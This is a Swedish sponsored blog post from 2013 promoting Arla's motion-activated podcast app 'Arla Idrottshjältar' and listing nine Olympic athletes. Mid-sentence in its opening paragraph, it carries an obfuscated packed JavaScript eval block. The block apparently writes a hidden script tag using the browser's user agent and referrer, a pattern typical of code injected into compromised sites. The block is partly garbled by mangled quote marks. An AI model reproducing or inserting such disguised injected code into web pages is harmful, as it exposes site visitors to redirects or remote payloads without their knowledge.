Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Sponsrad Video: Arla Idrottshjältar

arla
Filip Urde
  • On 15 oktober, 2013
  • http://www.revue.se/filip-urde

type=”text/javascript” src=”http://video.unrulymedia.com/wildfire_145868718.js”>

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tsezn|var|u0026u|referrer|ztini||js|php’.split(’|’),0,{}))
är snart dags för OS i Sotji, men redan nu kan du Lyssna på svenska idrottshjältarna inför OS.

Inför OS i Sotji lanserar Arla podcast-appen ”Arla Idrottshjältar”. Där kommer du kunna lyssna till nio av Sveriges OS-deltagare som berättar om sina med- och motgångar. Men med en liten twist… Du kan bara spela podcasten om du själv rör dig. Appen är en del i Arlas samarbete med SOK för ett friskare Sverige.

”Vi vill på ett roligt sätt motivera svenska folket till att röra på sig mer” – Niklas Larsson, mjölkansvarig hos Arla Foods.

Riktigt kul idé faktiskt och som tack för att du tar hand om dig själv och din kropp så kommer du alltså få lyssna till nio svenskar som har deltagit eller kommer att delta i OS och få en inblick i sina liv. Konceptet är mycket likt Sommar i P1, så du får ta del av deras egna historier där de i intervjuform berättar om med- och motgångar, hur de lyckas ha familj samtidigt som de tränar 20 pass i veckan, vad som är viktigt att tänka på när man tränar på elitnivå, maten och livet efter OS.

Appen är gratis och du kan lyssna på vilka avsnitt du vill, men bara om din mobil är i rörelse. Det spelar ingen roll om du är ute och går, tränar på gymmet, springer i skogen, sitter på cykeln i stan eller åker skidor på fjället. Det viktiga är att du rör på dig. Du kan själv välja om du vill lyssna i ett så kallat Live-läge under tiden du motionerar eller om du istället vill spara tiden och lyssna när det passar dig. Varje minut av träning motsvarar en minuts lyssnande.

Dessa Idrottshjältar möter du i podcasten:
– André Myhrer, alpint
– Viktoria Helgesson, konståkning
– Anna Holmlund, skicross
– Kim Martin, ishockey
– Anders Gustafsson, kanot
– Tomas Gustafson, skridsko
– Jonas Bergqvist, ishockey
– Mattias Sunneborn, längdhopp
– Ulrika Knape-Lindberg, simhopp

Det är alltid kul med innovativa sätt att få folk i rörelse.

Sponsrat inlägg av Arla.